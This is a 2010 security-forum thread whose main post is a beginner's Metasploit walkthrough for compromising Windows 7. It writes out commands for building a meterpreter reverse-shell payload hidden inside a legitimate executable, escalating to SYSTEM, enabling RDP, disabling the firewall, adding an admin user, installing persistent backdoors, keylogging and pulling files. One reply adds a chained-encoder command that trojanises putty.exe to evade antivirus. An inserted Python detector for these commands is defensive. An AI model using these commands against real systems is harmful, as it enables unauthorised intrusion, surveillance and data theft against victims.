Thread: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners


  1. #1
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Post [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Pentest on BT4 R1

    GUIDE EXPLANATION:
    Text in {} = Titles
    # In front of text = Info
    Text in [] = Your Input

    # Here are some examples on [] from the guide beneath:

    # set LHOST [IP ADDRESS INT.] = set LHOST 192.168.1.15

    # rdesktop [IP]:[port] -u "[USERNAME]" = rdesktop 192.168.1.15:1337 -u "John"

    # search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg = search -d "C:\\windows\\New folder" -f *.jpg

    # So when you input anything where there is [], remember to remove the []

    -------------------------------------

    {Shell 1} (Creating Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    # To update framework3
    
    clear
    
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many times it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    # If you get an encoder error, find another EXE or try to encode it fewer times

    # Copy payload to target


    -------------------------------------

    {Shell 2} (Using Exploit)

    Code:
    cd /pentest/exploits/framework3/
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADRESS INT.]
    
    set LPORT [PORT]
    # The port used in msfpayload in Shell 1
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, so start the payload on victim computer
    ----------

    Code:
    use priv
    
    ps
    # Look for PID on explorer.exe
    
    migrate [PID on explorer]
    
    getsystem
    
    sysinfo
    # If "Arch = x64", hashdump won't work
    # Now we are in the system

    -------------------------------------

    {Prepare for RDP}

    Code:
    shell
    # Connect to CMD
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
    # Allows incoming terminal service connections
    
    reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "fDenyTSConnections" /t REG_DWORD /d 0x0 /f
    # Disables blocking incoming Terminal service connections
    
    Netsh firewall set opmode enable
    # Enable Firewall on Victim
    
    Netsh firewall set opmode disable
    # Disable Firewall on Victim
    {USER:} (Still in shell)

    Code:
    net user [USERNAME] [PASSWORD] 
    # Change password for the user
    
    # Or create your own user
    
    net user [USERNAME] [PASSWORD] /add
    
    net localgroup [GROUP] [USERNAME] /add 
    # In [GROUP] you could use "administrators" and [USERNAME] is the user you just created
    
    net accounts /maxpwage:[days or unlimited]
    # Examples: net accounts /maxpwage:6
    # or: net accounts /maxpwage:unlimited
    # CTRL + Z then Y to exit shell without it freezing the system

    -------------------------------------

    {Shell 3} (RDP to compromised system)

    # No need for ":" and [PORT] if local

    # Remember to be in "root@bt:~#"
    Code:
    rdesktop [IP]:[port] -u "[USERNAME]"
    -------------------------------------

    {Setting up backdoors for future use} (when in meterpreter console)

    Code:
    run metsvc
    # Set backdoor for next time you want in
    
    # OR THIS:
    
    run persistence -r [YOUR IP ADDRESS INT./EXT.] -p [YOUR PORT] -A -X -i 300
    # 300 tells it to send a request for connection every 300 sec. "run persistence -h" for more info

    ***UP- AND DOWNSIDES USING THIS***

    METSVC:
    VERY BAD: All 3 files it uses get flagged by Norton Internet Security 2011 as a trojan, maybe other AVs will do this too!
    BAD: If the IP changes you have to know the IP to connect back to the victim
    GOOD: Easy to use
    GOOD: It doesn't request YOUR IP and port!

    PERSISTENCE:
    BAD: It requests YOUR IP and port!
    BAD: Can be more "difficult" to use
    GOOD: Flexible
    GOOD: Auto Connect
    ALMOST GOOD: svchost.exe is reported as suspicious, but NOT as malware! It's only when you run NPE (Norton Power Eraser) that it is detected as bad and removed. And that's a tool you must download!

    -------------------------------------

    {GET BACK INTO SYSTEM} (using metsvc in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/metsvc_bind_tcp
    
    set LPORT 31337
    # Must be this port, as far as I know
    
    set RHOST [VICTIM IP ADDRESS]
    
    show options
    # See if your setup is correct
    
    exploit
    ------------------------------------

    {GET BACK INTO SYSTEM} (using persistence in a new terminal)

    Code:
    cd /pentest/exploits/framework3/
    
    svn up
    
    clear
    
    ./msfconsole
    
    use exploit/multi/handler
    
    set PAYLOAD windows/meterpreter/reverse_tcp
    
    set LHOST [IP ADDRESS INT.]
    
    set LPORT [PORT]
    # The port set in persistence backdoor
    
    show options
    
    exploit
    ----------
    # Now we wait for connection, it will reconnect to your computer within 300 sec
    ----------

    getuid
    # If it is "NT AUTHORITY\SYSTEM", do this; otherwise go to "use priv":

    ps
    # Find PID on explorer.exe

    steal_token [NUMBER - PID on explorer]
    # From what I know it grants you the same rights as the user running that process


    use priv

    getsystem


    ------------------------------------

    {Search} (in meterpreter console)

    Code:
    search -f *.jpg
    # Finding all JPG files on the system
    
    search -d "[DRIVE:\\FOLDER\\FOLDER]" -f *.jpg
    # Finding all JPG files in a specific folder
    
    search -f test.txt
    # Find a specific file on the whole system
    ------------------------------------

    {Uploading and Downloading} (How I use it)

    # Use "ls", "pwd" and "cd" to navigate around - see below under commands

    Explanation:
    Create a txt file on your BT4 desktop and write anything in it, or nothing, and save it with the name "test.txt". Then, in the terminal in the meterpreter console (after you're connected to the victim), navigate to the desktop of the user currently logged in.
    Use "pwd" without quotes to check if the path is correct; if it is, type the following:


    {Upload}

    Code:
    upload /root/test.txt test.txt
    
    # And if you are uploading a file with a space in its name:
    
    upload "/root/test 2.txt" "test 2.txt"
    # Or if you're not in the path where you want to upload a file, and want it to be uploaded to another folder

    upload "/root/test 2.txt" "DRIVE:\\FOLDER\\FOLDER\\test 2.txt"
    # Example: upload "/root/test 2.txt" "C:\\test\\test1\\test 2.txt"


    {Download}

    Explanation:
    Now we are going to download the file we just uploaded, "test.txt". Navigate to the folder if you're not already in it, by using the "cd", "pwd" and "ls" commands.

    Then type:


    Code:
    download test.txt /root/test.txt
    
    # And if you are downloading a file with a space in its name
    
    download "test 2.txt" "/root/test 2.txt"
    
    # Or if you're not in the path where you want to download a file from, but know the exact path and name by using search
    
    download "DRIVE:\\FOLDER\\FOLDER\\test 2.txt" "/root/test 2.txt"
    # Example: download "C:\\test\\test1\\test 2.txt" "/root/test 2.txt"
    ------------------------------------

    {Commands} (meterpreter console)


    help
    # USE THIS!!! That's mostly how I got this knowledge, and then googled the commands to get more info on them

    screenshot
    # No need to say what it does - remember you must have used "use priv" in meterpreter first

    cd [DRIVE:\\FOLDER\\FOLDER]
    # You get it - Change directory

    pwd
    # Show what directory you're in

    ls
    # List Current Directory

    upload

    # See above

    download

    # See above

    search
    # See above and Meterpreter Search. This can be used in different consoles!

    keyscan_start
    # Key Sniffer - Start

    keyscan_dump
    # Key Sniffer - dump keys while running

    keyscan_stop
    # Key Sniffer - Stop

    ------------------------------------

    Few words from me:

    First i will say, USE THIS AT YOUR OWN RISK! Do not blame me for anything. DO NOT misuse this information, only use this in a test setup!

    And I will point out for other beginners: I started using Metasploit 2 days ago, so do yourself a favour and put some heart into it, do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.

    As always, if you have any questions, google it first and then google it some more, and THEN ask for directions, not the solution!

    Please give some feedback
    Last edited by xibit1987; 09-16-2010 at 10:00 PM. Reason: Code wrapping, and fix typos
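
    Added example, not part of the original post and not Metasploit or BackTrack code: a defender-side sketch in Python that scans process-creation telemetry for the victim-side cmd.exe commands the {Prepare for RDP} and {USER:} sections above type (the Terminal Server registry change, netsh firewall opmode disable, net user /add, net localgroup administrators /add, net accounts /maxpwage:unlimited) and raises one correlated alert per host when enough of them land inside a short window. The flat log format, the field names, the sample events, the rule weights, the threshold and the window are all assumptions made for this example; map the parser onto your own source (Sysmon event 1, Security event 4688, or EDR process events).

```python
"""Defender-side sketch (added example): flag the guide's victim-side cmd.exe
commands in process-creation telemetry and correlate them per host.

Assumptions made for this example: the flat log format below, the field names,
the sample events, the rule weights, the threshold and the time window.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (rule name, pattern over the command line, weight). Patterns mirror the
# commands in the {Prepare for RDP} and {USER:} sections; weights are assumed.
RULES = [
    ("rdp_enabled_via_registry",
     re.compile(r"reg\s+add\s+.*terminal server.*(fDenyTSConnections|AllowTSConnections)", re.I), 3),
    ("host_firewall_disabled",
     re.compile(r"netsh\s+firewall\s+set\s+opmode\s+disable", re.I), 3),
    ("local_user_created",
     re.compile(r"net\s+user\s+\S+\s+\S+\s+/add\b", re.I), 2),
    ("added_to_local_admins",
     re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add\b", re.I), 3),
    ("password_expiry_disabled",
     re.compile(r"net\s+accounts\s+/maxpwage:unlimited", re.I), 1),
]
ALERT_THRESHOLD = 5             # assumed: weight sum that raises an alert
WINDOW = timedelta(minutes=10)  # assumed: per-host correlation window

# Assumed flat format, one process-creation event per line.
LINE_RE = re.compile(
    r'^(?P<ts>\S+ \S+) host=(?P<host>\S+) user=(?P<user>\S+) '
    r'parent=(?P<parent>\S+) cmd="(?P<cmd>.*)"$'
)


def parse_line(line):
    """Parse one log line into a dict with a datetime 'ts'; None if malformed."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ev = m.groupdict()
    ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%d %H:%M:%S")
    return ev


def match_rules(cmd):
    """Return [(rule name, weight)] for every rule whose pattern hits the command line."""
    return [(name, weight) for name, pattern, weight in RULES if pattern.search(cmd)]


def correlate(lines):
    """Per host, sum the weights of rule hits inside a sliding WINDOW and return one
    alert dict (host, score, rules, first, last) per host reaching ALERT_THRESHOLD."""
    hits = defaultdict(list)
    for raw in lines:
        ev = parse_line(raw)
        if ev is None:
            continue  # malformed lines are skipped, not fatal
        for name, weight in match_rules(ev["cmd"]):
            hits[ev["host"]].append((ev["ts"], name, weight))

    alerts = []
    for host, events in hits.items():
        events.sort()
        for i, (start, _, _) in enumerate(events):
            window = [e for e in events[i:] if e[0] - start <= WINDOW]
            score = sum(w for _, _, w in window)
            if score >= ALERT_THRESHOLD:
                alerts.append({"host": host, "score": score,
                               "rules": sorted({n for _, n, _ in window}),
                               "first": start, "last": window[-1][0]})
                break  # one alert per host is enough for this sketch
    return alerts


# Constructed sample telemetry (not real data). WS-07 shows the guide's full
# sequence within two minutes; WS-12 shows a lone helpdesk action that must not alert.
SAMPLE_LOG = [
    r'2010-09-16 21:40:01 host=WS-07 user=alice parent=cmd.exe cmd="reg add "hklm\system\currentControlSet\Control\Terminal Server" /v AllowTSConnections /t REG_DWORD /d 0x1 /f"',
    r'2010-09-16 21:40:03 host=WS-07 user=alice parent=cmd.exe cmd="reg add "hklm\system\currentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0x0 /f"',
    r'2010-09-16 21:40:20 host=WS-07 user=alice parent=cmd.exe cmd="netsh firewall set opmode disable"',
    r'2010-09-16 21:41:05 host=WS-07 user=alice parent=cmd.exe cmd="net user backup2 Passw0rd /add"',
    r'2010-09-16 21:41:10 host=WS-07 user=alice parent=cmd.exe cmd="net localgroup administrators backup2 /add"',
    r'2010-09-16 21:41:30 host=WS-07 user=alice parent=cmd.exe cmd="net accounts /maxpwage:unlimited"',
    r'2010-09-17 09:15:00 host=WS-12 user=helpdesk parent=cmd.exe cmd="net user temp01 Welcome1 /add"',
    r'2010-09-17 09:15:30 host=WS-12 user=helpdesk parent=cmd.exe cmd="ipconfig /all"',
    "this line is malformed and is skipped by the parser",
]

if __name__ == "__main__":
    for a in correlate(SAMPLE_LOG):
        print(f"[ALERT] {a['host']} score={a['score']} {a['first']}..{a['last']} "
              f"rules={', '.join(a['rules'])}")
```

    The correlation is the point: a lone net user /add is routine helpdesk work, which is why the WS-12 lines do not alert, while the guide's sequence on WS-07 does. The backdoor sections deserve the same treatment: the metsvc service listening on TCP 31337 and the autostart entry the persistence script creates with -X are both host-side artefacts that telemetry can catch.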

  2. #2
    Super Moderator lupin's Avatar
    Join Date
    Jan 2010
    Posts
    2,943

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    You might want to make use of code boxes and some simple formatting options to make that a bit easier to follow...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

    The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

  3. #3
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by lupin View Post
    You might want to make use of code boxes and some simple formatting options to make that a bit easier to follow...
    Done now, saw it right away, looked better in Notepad xD

  4. #4
    Super Moderator Archangel-Amael's Avatar
    Join Date
    Jan 2010
    Location
    Somewhere
    Posts
    8,012

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    The best part was probably the last few lines
    : I started using Metasploit 2 days ago, so do yourself a favour and put some heart into it, do your legwork before asking; I just gave you a complete detailed guide from start to finish, on a silver platter.
    Probably doesn't get truer than that.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  5. #5
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by Archangel-Amael View Post
    The best part was probably the last few lines

    Probably doesn't get truer than that.
    Well, most beginners ask because they just want the info so that they can misuse it to do harm, without a better understanding of what it is they are doing, where only a few ask because they really want to learn something from it.

    I know this guide can and will be misused by some ppl, and I'm fine with that, I just hope they get caught. I don't have respect for ppl who want to break into others' systems without their permission, I really can't see the point in it :/

    I'm learning this so that I know a little more about how I can be attacked, and I use this info so that I maybe can close some holes in my setup at home. And it's also quite fun.

  6. #6
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

    Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. And everybody likes better software.

    I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
    Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

    Metasploit Unleashed - Mastering the Framework

    I've had a lot of fun messing around with backdooring a few of the most used Windows exes.

    I can see you've done your reading however. Great tut! esp after the editing you've done

  7. #7
    Just burned his ISO
    Join Date
    Sep 2007
    Posts
    11

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by iproute View Post
    I've found that getting into the security end has really forced me to get deeper into the protocols and such that I've already been working with as a networker.

    Also, though perhaps indirectly, pentesting and the security 'arts' eventually (not always...) force developers round the world to improve their code. And everybody likes better software.

    I appreciated the section you did on backdooring. You may want to include the backdooring an exe capability. If you're not sure how to with metasploit, check out the metasploit unleashed section on extended msf usage.
    Chapter 12 section 2. Great feature, although the MSF unleashed page only goes into the beginning detail of it, probably due to all of our favorite mantra (try harder!)

    Metasploit Unleashed - Mastering the Framework

    I've had a lot of fun messing around with backdooring a few of the most used Windows exes.

    I can see you've done your reading however. Great tut! esp after the editing you've done
    About backdooring an exe: I already have that in the "Create the exploit" section, the first code box in the guide. I use encode here and I also explain a LITTLE bit about the error you can get. I didn't go directly into details, but if that's what you guys want I can do that too. By the way, have any of you got the "-k" option to work yet, so that the exe you're backdooring still works? If yes, please post an example code.

    And again, I'm a beginner, so please correct me if I have understood anything wrong or explained anything in the wrong way!

    I thank you all for the kind words
    Last edited by xibit1987; 09-24-2010 at 01:22 AM.

  8. #8
    Just burned his ISO
    Join Date
    Sep 2010
    Posts
    4

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Hi, I'm sorry for my amateur question. I'm new to Metasploit.

    I don't get this section:
    Code:
    ./msfpayload windows/meterpreter/reverse_tcp LHOST=[YOUR IP ADDRESS INT./EXT.] LPORT=[YOUR PORT] R | ./msfencode -c [NUMBER - How many times it will be encoded] -e x86/shikata_ga_nai -x /root/[SOFTWARE_NAME].exe -t exe > /root/[NEW_SOFTWARE_NAME].exe
    What EXE do I need?

  9. #9
    Senior Member iproute's Avatar
    Join Date
    Jan 2010
    Location
    Midwest, USA
    Posts
    192

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Quote Originally Posted by xibit1987 View Post
    About backdooring an exe: I already have that in the "Create the exploit" section, the first code box in the guide. I use encode here and I also explain a LITTLE bit about the error you can get. I didn't go directly into details, but if that's what you guys want I can do that too. By the way, have any of you got the "-k" option to work yet, so that the exe you're backdooring still works? If yes, please post an example code.

    And again, I'm a beginner, so please correct me if I have understood anything wrong or explained anything in the wrong way!

    I thank you all for the kind words

    Actually the -k option is what I am specifically referring to with my backdooring comment. As this is a client-side attack, tricking/social engineering the user is everything, so keeping the backdoored exe working can be key sometimes. Not all executables work as templates with the -k option, or possibly even as templates in the first place.

    Also bear in mind that this example code here did not pass my current avast. I am moving this week and don't have time to re-work the encoding so it does. It did formerly, however the executable made with this multi-encoding command string has been uploaded to virustotal for testing, as really the command was simple for testing the workings of running multiple encoders. I also developed this particular string some time ago.

    The code in this case is simply an example that yes multiple encoders can still be used when backdooring an exe and even still keeping template exe working.

    Code:
    msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.25.26 LPORT=1417 R \
      | msfencode -e x86/shikata_ga_nai -c 3 -t raw \
      | msfencode -e x86/call4_dword_xor -c 4 -t raw \
      | msfencode -e x86/fnstenv_mov -c 5 -t raw \
      | msfencode -e x86/countdown -c 4 -t raw \
      | msfencode -e x86/shikata_ga_nai -c 16 -t exe -x /root/putty.exe -k -o /root/putty-backdoored.exe
    Again, when running it with this post Avast did detect the exe and disposed of it. With avast off I am able to get a meterpreter session started. Of course modify ip address and port as needed.

  10. #10
    Junior Member
    Join Date
    Aug 2010
    Posts
    48

    Default Re: [HOW-TO] Metasploit attack on Win 7 x86/x64 - Detailed for beginners

    Yes indeed a great tut, I have yet to try it. Like all tuts I have been through, there are always issues to get around, and that is the fun of it. No attack is completely linear to the others, and in turn forces you to learn outside the given realm.

    I am not a security professional, more-so an enthusiast. It is tuts like these that not only educate people like me, but allow me to apply said education and offer the information to others who do not have the time or knowledge.

    I have had numerous friends have their data limits completely thrashed by intruders, which causes them to spend more money. I have had mine and other friends' banking information sniffed out (by neighbours who had a little run-in with the law post-hack) and in turn have used what little information I have to amateurly secure their networks and routers.

    And to think 2 months ago I was completely ignorant of BackTrack, and now after two months of passive learning, I can say that I have the basic knowledge and ability to secure minor residential networks for friends and family, and I have these forums to thank, and the posters I am indebted to. No one will be stealing my gigabytes and money anymore!

    Thanks for the tuts, the help, the information and overall professional attitude reflected by a majority of users on this site. Thanks again.
